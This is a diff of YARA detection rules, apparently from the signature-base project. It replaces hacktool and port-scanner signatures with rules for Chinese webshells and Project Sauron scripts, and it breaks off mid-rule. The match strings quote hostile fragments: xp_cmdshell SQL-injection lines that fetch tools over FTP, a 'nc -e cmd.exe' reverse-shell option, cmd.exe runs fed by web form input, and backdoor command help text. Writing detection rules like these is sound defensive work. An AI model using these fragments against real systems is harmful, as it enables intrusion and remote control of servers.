-rule SIGNATURE_BASE_Portscan
+rule SIGNATURE_BASE_Txt_Ftp : FILE
 {
 	meta:
-		description = "Auto-generated rule on file portscan.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "967d6e3b-ae0d-5f93-a20d-742fc010608d"
-		date = "2016-02-15"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L359-L370"
+		description = "Chinese Hacktool Set - Webshells - file ftp.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "311de4b0-fa19-545a-8a65-a40b255b5b39"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L554-L573"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a8bfdb2a925e89a281956b1e3bb32348"
-		logic_hash = "d93b54ffc7416b5354304daf156908f11d7e320a91bd936e397a15ede63caae3"
+		hash = "3495e6bcb5484e678ce4bae0bd1a420b7eb6ad1d"
+		logic_hash = "02eae9b19274ab7b816d7c336017af8f0fdd5273664eb37be92be12661f3ef1f"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s5 = "0    :SCAN BEGUN ON PORT:"
-		$s6 = "0    :PORTSCAN READY."
+		$s1 = "';exec master.dbo.xp_cmdshell 'echo open " ascii
+		$s2 = "';exec master.dbo.xp_cmdshell 'ftp -s:';" ascii
+		$s3 = "';exec master.dbo.xp_cmdshell 'echo get lcx.exe" ascii
+		$s4 = "';exec master.dbo.xp_cmdshell 'echo get php.exe" ascii
+		$s5 = "';exec master.dbo.xp_cmdshell 'copy " ascii
+		$s6 = "ftp -s:d:\\ftp.txt " fullword ascii
+		$s7 = "echo bye>>d:\\ftp.txt " fullword ascii
 
 	condition:
-		all of them
+		filesize < 2KB and 2 of them
 }
-rule SIGNATURE_BASE_Proport_Zip_Folder_Proport
+rule SIGNATURE_BASE_Txt_Lcx : FILE
 {
 	meta:
-		description = "Auto-generated rule on file ProPort.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "cd611f6c-42ed-5cd3-a6ab-7e0970925e61"
-		date = "2016-02-15"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L372-L389"
+		description = "Chinese Hacktool Set - Webshells - file lcx.c"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4a4e8810-6dae-526e-86f0-43de45d1c87a"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L575-L592"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c1937a86939d4d12d10fc44b7ab9ab27"
-		logic_hash = "0ee2ffc5ed243d170b8013b3a164a3719f43bd473f4af7e1a2697d88a298fe9f"
+		hash = "ddb3b6a5c5c22692de539ccb796ede214862befe"
+		logic_hash = "48121824d3173b77b54b52dc60d3422a904ada46a6ebb20bb585086911cd8360"
 		score = 75
 		quality = 85
-		tags = ""
-
-	strings:
-		$s0 = "Corrupt Data!"
-		$s1 = "K4p~omkIz"
-		$s2 = "DllTrojanScan"
-		$s3 = "GetDllInfo"
-		$s4 = "Compressed by Petite (c)1999 Ian Luck."
-		$s5 = "GetFileCRC32"
-		$s6 = "GetTrojanNumber"
-		$s7 = "TFAKAbout"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s1 = "printf(\"Usage:%s -m method [-h1 host1] -p1 port1 [-h2 host2] -p2 port2 [-v] [-l" ascii
+		$s2 = "sprintf(tmpbuf2,\"\\r\\n########### reply from %s:%d ####################\\r\\n" ascii
+		$s3 = "printf(\" 3: connect to HOST1:PORT1 and HOST2:PORT2\\r\\n\");" fullword ascii
+		$s4 = "printf(\"got,ip:%s,port:%d\\r\\n\",inet_ntoa(client1.sin_addr),ntohs(client1.sin" ascii
+		$s5 = "printf(\"[-] connect to host1 failed\\r\\n\");" fullword ascii
 
 	condition:
-		all of them
+		filesize < 25KB and 2 of them
 }
-rule SIGNATURE_BASE_Stealthwasp_S_Basic_Portscanner_V1_2
+rule SIGNATURE_BASE_Txt_Jspcmd : FILE
 {
 	meta:
-		description = "Auto-generated rule on file StealthWasp's Basic PortScanner v1.2.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "7f706186-f2e2-5d4d-951a-2ec8fc757cec"
-		date = "2016-02-15"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L391-L402"
+		description = "Chinese Hacktool Set - Webshells - file jspcmd.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "53eb6caf-3578-5df7-a1d8-9e4038b6f57e"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L594-L608"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7c0f2cab134534cd35964fe4c6a1ff00"
-		logic_hash = "b01c165b5e5be3ba6905e8bc44a14c3d7195effd058e4c0c31678777d19db8b5"
+		hash = "1d4e789031b15adde89a4628afc759859e53e353"
+		logic_hash = "d2cbf753fbd9e261234e6beb6f79aecb407a368704ae09d907d128d04c242053"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Basic PortScanner"
-		$s6 = "Now scanning port:"
+		$s0 = "if(\"1752393\".equals(request.getParameter(\"Confpwd\"))){" fullword ascii
+		$s4 = "out.print(\"Hi,Man 2015\");" fullword ascii
 
 	condition:
-		all of them
+		filesize < 1KB and 1 of them
 }
-rule SIGNATURE_BASE_Bluesportscan
+rule SIGNATURE_BASE_Txt_Jsp : FILE
 {
 	meta:
-		description = "Auto-generated rule on file BluesPortScan.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "4bcb8b7c-5e22-5496-9a29-66e85e3c3395"
-		date = "2016-02-15"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L404-L415"
+		description = "Chinese Hacktool Set - Webshells - file jsp.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "53eb6caf-3578-5df7-a1d8-9e4038b6f57e"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L610-L626"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6292f5fc737511f91af5e35643fc9eef"
-		logic_hash = "5cb4e4b87eaf166c85d23114f5abc10ef83b4a29968bf6fef4b3fce7ff2787fd"
+		hash = "74518faf08637c53095697071db09d34dbe8d676"
+		logic_hash = "039b145031cf1127cb1b2aeda063d578d9eb151559232d7e6049965111df1e28"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "This program was made by Volker Voss"
-		$s1 = "JiBOo~SSB"
+		$s1 = "program = \"cmd.exe /c net start > \" + SHELL_DIR" fullword ascii
+		$s2 = "Process pro = Runtime.getRuntime().exec(exe);" fullword ascii
+		$s3 = "<option value=\\\"nc -e cmd.exe 192.168.230.1 4444\\\">nc</option>\"" fullword ascii
+		$s4 = "cmd = \"cmd.exe /c set\";" fullword ascii
 
 	condition:
-		all of them
+		filesize < 715KB and 2 of them
 }
-rule SIGNATURE_BASE_Scanarator_Iis
+rule SIGNATURE_BASE_Txt_Aspxlcx : FILE
 {
 	meta:
-		description = "Auto-generated rule on file iis.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "a467147b-53c8-53db-aa33-5f0e4e066988"
-		date = "2016-02-15"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L417-L428"
+		description = "Chinese Hacktool Set - Webshells - file aspxlcx.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e01a7235-5c69-5676-ac5d-c4e4632f31b2"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L628-L644"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3a8fc02c62c8dd65e038cc03e5451b6e"
-		logic_hash = "092cb902e10624b207b7932e6b3c1fe2277ed1d183e5de9ee4d07d8548e90ab6"
+		hash = "453dd3160db17d0d762e032818a5a10baf234e03"
+		logic_hash = "a6e41e6882e74b0dd55ec4afbf6f8708e28267657e304c97d1304266fe1fbc93"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "example: iis 10.10.10.10"
-		$s1 = "send error"
+		$s1 = "public string remoteip = " ascii
+		$s2 = "=Dns.Resolve(host);" ascii
+		$s3 = "public string remoteport = " ascii
+		$s4 = "public class PortForward" ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x253c and filesize < 18KB and all of them
 }
-rule SIGNATURE_BASE_Stealth_Stealth
+rule SIGNATURE_BASE_Txt_Xiao : FILE
 {
 	meta:
-		description = "Auto-generated rule on file Stealth.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "5f45882e-3e27-596d-8725-fad380e1c297"
-		date = "2016-02-15"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L430-L441"
+		description = "Chinese Hacktool Set - Webshells - file xiao.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cd375597-c343-5f7d-8574-23f700ff432b"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L646-L663"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8ce3a386ce0eae10fc2ce0177bbc8ffa"
-		logic_hash = "e210b1a553549c22f66511dfc9d0d3f5b17f02981b9e9915827bc909f34b3262"
+		hash = "b3b98fb57f5f5ccdc42e746e32950834807903b7"
+		logic_hash = "e99c307482148e4d0eb660281fa70f2dcece200ac8aed032bbef41e421d2a155"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "<table width=\"60%\" bgcolor=\"black\" cellspacing=\"0\" cellpadding=\"2\" border=\"1\" bordercolor=\"white\"><tr><td>"
-		$s6 = "This tool may be used only by system administrators. I am not responsible for "
+		$s1 = "Session.Contents.Remove(m & \"userPassword\")" fullword ascii
+		$s2 = "passWord = Encode(GetPost(\"password\"))" fullword ascii
+		$s3 = "conn.Execute(\"Create Table FileData(Id int IDENTITY(0,1) PRIMARY KEY CLUSTERED," ascii
+		$s4 = "function Command(cmd, str){" fullword ascii
+		$s5 = "echo \"if(obj.value=='PageWebProxy')obj.form.target='_blank';\"" fullword ascii
 
 	condition:
-		all of them
+		filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_Angry_IP_Scanner_V2_08_Ipscan
+rule SIGNATURE_BASE_Txt_Aspx : FILE
 {
 	meta:
-		description = "Auto-generated rule on file ipscan.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "5fbcbb95-6cd4-5587-bf44-5b5ed133ce5e"
-		date = "2016-02-15"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L443-L455"
+		description = "Chinese Hacktool Set - Webshells - file aspx.jpg"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e01a7235-5c69-5676-ac5d-c4e4632f31b2"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L665-L681"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "70cf2c09776a29c3e837cb79d291514a"
-		logic_hash = "1b50856ad35c146a684298a86f1629c45996ab08ffae8486a388805262ec2367"
+		hash = "ce24e277746c317d887139a0d71dd250bfb0ed58"
+		logic_hash = "43c386bfa88db77801b0494d6a5e4406688f957ffedeb4d2ecdd244549dec708"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "_H/EnumDisplay/"
-		$s5 = "ECTED.MSVCRT0x"
-		$s8 = "NotSupported7"
+		$s1 = "SQLExec : <asp:DropDownList runat=\"server\" ID=\"FGEy\" AutoPostBack=\"True\" O" ascii
+		$s2 = "Process[] p=Process.GetProcesses();" fullword ascii
+		$s3 = "Copyright &copy; 2009 Bin" ascii
+		$s4 = "<td colspan=\"5\">CmdShell&nbsp;&nbsp;:&nbsp;<input class=\"input\" runat=\"serv" ascii
 
 	condition:
-		all of them
+		filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_Crack_Loader
+rule SIGNATURE_BASE_Txt_Sql : FILE
 {
 	meta:
-		description = "Auto-generated rule on file Loader.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "0c4c7b69-7739-5c1b-8c7c-4aaa724e4455"
-		date = "2016-02-15"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L457-L468"
+		description = "Chinese Hacktool Set - Webshells - file Sql.txt"
+		author = "Florian Roth (Nextron Systems)"
+		id = "586f23d4-3a04-520d-b75b-f9bbcf67ceeb"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L683-L699"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f4f79358a6c600c1f0ba1f7e4879a16d"
-		logic_hash = "3380ace7c34c15dfd9a9625c8c4a1ed7e35c1cf3c2eca9b1e00dd0092d256150"
+		hash = "f7813f1dfa4eec9a90886c80b88aa38e2adc25d5"
+		logic_hash = "0712b6736d8bdc1f19b3494dc3aab9e9a04dde167b5f843e319755cd311e29bd"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "NeoWait.exe"
-		$s1 = "RRRRRRRW"
+		$s1 = "cmd=chr(34)&\"cmd.exe /c \"&request.form(\"cmd\")&\" > 8617.tmp\"&chr(34)" fullword ascii
+		$s2 = "strQuery=\"dbcc addextendedproc ('xp_regwrite','xpstar.dll')\"" fullword ascii
+		$s3 = "strQuery = \"exec master.dbo.xp_cmdshell '\" & request.form(\"cmd\") & \"'\" " fullword ascii
+		$s4 = "session(\"login\")=\"\"" fullword ascii
 
 	condition:
-		all of them
+		filesize < 15KB and all of them
 }
-rule SIGNATURE_BASE_CN_GUI_Scanner
+rule SIGNATURE_BASE_Txt_Hello : FILE
 {
 	meta:
-		description = "Detects an unknown GUI scanner tool - CN background"
+		description = "Chinese Hacktool Set - Webshells - file hello.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ca88d4d3-5d18-5856-874f-e50deceef54f"
-		date = "2014-04-10"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L470-L487"
+		id = "42d01411-e333-543d-84a2-758c13bad2df"
+		date = "2015-06-14"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L701-L717"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3c67bbb1911cdaef5e675c56145e1112"
-		logic_hash = "f9281277ad7058527699d1f5037bb78be1363c90f38e2e399592c58f0b313bd7"
-		score = 65
+		hash = "697a9ebcea6a22a16ce1a51437fcb4e1a1d7f079"
+		logic_hash = "823a0a74b07c8f4821247b3cf0450069a9888d44ccd87144330da88594f260c0"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "good.txt" fullword ascii
-		$s2 = "IP.txt" fullword ascii
-		$s3 = "xiaoyuer" fullword ascii
-		$s0w = "ssh(" wide
-		$s1w = ").exe" fullword wide
+		$s0 = "Dim myProcessStartInfo As New ProcessStartInfo(\"cmd.exe\")" fullword ascii
+		$s1 = "myProcessStartInfo.Arguments=\"/c \" & Cmd.text" fullword ascii
+		$s2 = "myProcess.Start()" fullword ascii
+		$s3 = "<p align=\"center\"><a href=\"?action=cmd\" target=\"_blank\">" fullword ascii
 
 	condition:
-		all of them
+		filesize < 25KB and all of them
 }
-rule SIGNATURE_BASE_CN_Packed_Scanner : FILE
+rule SIGNATURE_BASE_APT_Project_Sauron_Scripts
 {
 	meta:
-		description = "Suspiciously packed executable"
+		description = "Detects scripts (mostly LUA) from Project Sauron report by Kaspersky"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a11c4ee6-7244-5601-af26-a45f9fdc8e1b"
-		date = "2014-06-10"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L489-L505"
+		id = "575a6f1b-5a4d-5f81-b44a-b7025dbec2a5"
+		date = "2016-08-08"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/eFoP4A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron_extras.yar#L1-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6323b51c116a77e3fba98f7bb7ff4ac6"
-		logic_hash = "0d9178ec65029e4ce8d4c3cc28ebd041c612f3a48f095b60c7a4515de03cccf4"
-		score = 40
-		quality = 83
-		tags = "FILE"
+		logic_hash = "275ec8de40ae973b4ec4c891c56a70fc2fd05abff258b8015d986d0106506367"
+		score = 75
+		quality = 85
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "kernel32.dll" fullword ascii
-		$s2 = "CRTDLL.DLL" fullword ascii
-		$s3 = "__GetMainArgs" fullword ascii
-		$s4 = "WS2_32.DLL" fullword ascii
+		$x1 = "local t = w.exec2str(\"regedit "
+		$x2 = "local r = w.exec2str(\"cat"
+		$x3 = "ap*.txt link*.txt node*.tun VirtualEncryptedNetwork.licence"
+		$x4 = "move O FakeVirtualEncryptedNetwork.dll"
+		$x5 = "sinfo | basex b 32url | dext l 30"
+		$x6 = "w.exec2str(execStr)"
+		$x7 = "netnfo irc | basex b 32url"
+		$x8 = "w.exec(\"wfw status\")"
+		$x9 = "exec(\"samdump\")"
+		$x10 = "cat VirtualEncryptedNetwork.ini|grep"
+		$x11 = "if string.lower(k) == \"securityproviders\" then"
+		$x12 = "exec2str(\"plist b | grep netsvcs\")"
+		$x14 = "SAURON_KBLOG_KEY ="
 
 	condition:
-		all of them and filesize < 180KB and filesize > 70KB
+		1 of them
 }
-rule SIGNATURE_BASE_Tiny_Network_Tool_Generic : FILE
+rule SIGNATURE_BASE_HKTL_Dsniff
 {
 	meta:
-		description = "Tiny tool with suspicious function imports. (Rule based on WinEggDrop Scanner samples)"
+		description = "Detects Dsniff hack tool"
 		author = "Florian Roth (Nextron Systems)"
-		id = "04b1c2c6-605c-52d5-aa07-f3b77a6c4593"
-		date = "2014-08-10"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L507-L539"
+		id = "eb39185b-330f-5b93-ac58-0465e5767919"
+		date = "2019-02-19"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/eFoP4A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron_extras.yar#L27-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "efd04ee3a7bb120cdff00369e1856dd03ec9db84e1fb3196bf5e1a8ebd302802"
-		score = 40
+		logic_hash = "0edd3ba7e78ee2810aa3c7643a96382c1fe0b5e627913a5a9bac2e83c8d40274"
+		score = 55
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash0 = "9e1ab25a937f39ed8b031cd8cfbc4c07"
-		hash1 = "cafc31d39c1e4721af3ba519759884b9"
-		hash2 = "8e635b9a1e5aa5ef84bfa619bd2a1f92"
+		tags = ""
 
 	strings:
-		$s0 = "KERNEL32.DLL" fullword ascii
-		$s1 = "CRTDLL.DLL" fullword ascii
-		$s3 = "LoadLibraryA" fullword ascii
-		$s4 = "GetProcAddress" fullword ascii
-		$y1 = "WININET.DLL" fullword ascii
-		$y2 = "atoi" fullword ascii
-		$x1 = "ADVAPI32.DLL" fullword ascii
-		$x2 = "USER32.DLL" fullword ascii
-		$x3 = "wsock32.dll" fullword ascii
-		$x4 = "FreeSid" fullword ascii
-		$x5 = "atoi" fullword ascii
-		$z1 = "ADVAPI32.DLL" fullword ascii
-		$z2 = "USER32.DLL" fullword ascii
-		$z3 = "FreeSid" fullword ascii
-		$z4 = "ToAscii" fullword ascii
+		$x1 = ".*account.*|.*acct.*|.*domain.*|.*login.*|.*member.*"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $s* ) and ( all of ( $y* ) or all of ( $x* ) or all of ( $z* ) ) and filesize < 15KB
+		1 of them
 }
-rule SIGNATURE_BASE_Beastdoor_Backdoor
+rule SIGNATURE_BASE_APT_Project_Sauron_Arping_Module
 {
 	meta:
-		description = "Detects the backdoor Beastdoor"
+		description = "Detects strings from arping module - Project Sauron report by Kaspersky"
 		author = "Florian Roth (Nextron Systems)"
-		id = "64f67233-6677-53c8-b212-f1a425f78803"
-		date = "2016-02-15"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L541-L561"
+		id = "42389511-de92-57cb-9dee-9f829fd5e55a"
+		date = "2016-08-08"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/eFoP4A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron_extras.yar#L41-L55"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5ab10dda548cb821d7c15ebcd0a9f1ec6ef1a14abcc8ad4056944d060c49535a"
-		logic_hash = "35aa5d66c0fd4bf1995fc23a68283e8a28f31b5a1e1f3b742dd0ab89c48bf403"
-		score = 55
+		logic_hash = "d87e91441994c4ed863596d79c108c9f72adfb708f885cb63a881eb25aa089b7"
+		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Redirect SPort RemoteHost RPort  -->Port Redirector" fullword
-		$s1 = "POST /scripts/WWPMsg.dll HTTP/1.0" fullword
-		$s2 = "http://IP/a.exe a.exe            -->Download A File" fullword
-		$s7 = "Host: wwp.mirabilis.com:80" fullword
-		$s8 = "%s -Set Port PortNumber              -->Set The Service Port" fullword
-		$s11 = "Shell                            -->Get A Shell" fullword
-		$s14 = "DeleteService ServiceName        -->Delete A Service" fullword
-		$s15 = "Getting The UserName(%c%s%c)-->ID(0x%s) Successfully" fullword
-		$s17 = "%s -Set ServiceName ServiceName      -->Set The Service Name" fullword
+		$s1 = "Resolve hosts that answer"
+		$s2 = "Print only replying Ips"
+		$s3 = "Do not display MAC addresses"
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Powershell_Netcat
+rule SIGNATURE_BASE_APT_Project_Sauron_Kblogi_Module
 {
 	meta:
-		description = "Detects a Powershell version of the Netcat network hacking tool"
+		description = "Detects strings from kblogi module - Project Sauron report by Kaspersky"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e4b018c0-3214-5102-93b1-6a048324f9dd"
-		date = "2014-10-10"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L563-L577"
+		id = "e1dd4d1a-1089-5897-8f4a-52c7068802fa"
+		date = "2016-08-08"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/eFoP4A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron_extras.yar#L57-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ff9d7c3e83fd27620559306c07556ce7afd1ba7a5db5f5c21ad0841d58b85014"
-		score = 60
+		logic_hash = "bba87b17a62fc968e89d4f6d10de06875c6b7f47c8bb7ae3f7932804b23a8e87"
+		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "[ValidateRange(1, 65535)]" fullword
-		$s1 = "$Client = New-Object -TypeName System.Net.Sockets.TcpClient" fullword
-		$s2 = "$Buffer = New-Object -TypeName System.Byte[] -ArgumentList $Client.ReceiveBufferSize" fullword
+		$x1 = "Inject using process name or pid. Default"
+		$s2 = "Convert mode: Read log from file and convert to text"
+		$s3 = "Maximum running time in seconds"
 
 	condition:
-		all of them
+		$x1 or 2 of them
 }
-rule SIGNATURE_BASE_Chinese_Hacktool_1014
+rule SIGNATURE_BASE_APT_Project_Sauron_Basex_Module
 {
 	meta:
-		description = "Detects a chinese hacktool with unknown use"
+		description = "Detects strings from basex module - Project Sauron report by Kaspersky"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e5db5f58-a1fd-51e0-9037-337fcca71f11"
-		date = "2014-10-10"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L579-L596"
+		id = "51ef3826-af5c-562b-a1f8-3bf11532ac2d"
+		date = "2016-08-08"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/eFoP4A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron_extras.yar#L73-L87"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "98c07a62f7f0842bcdbf941170f34990"
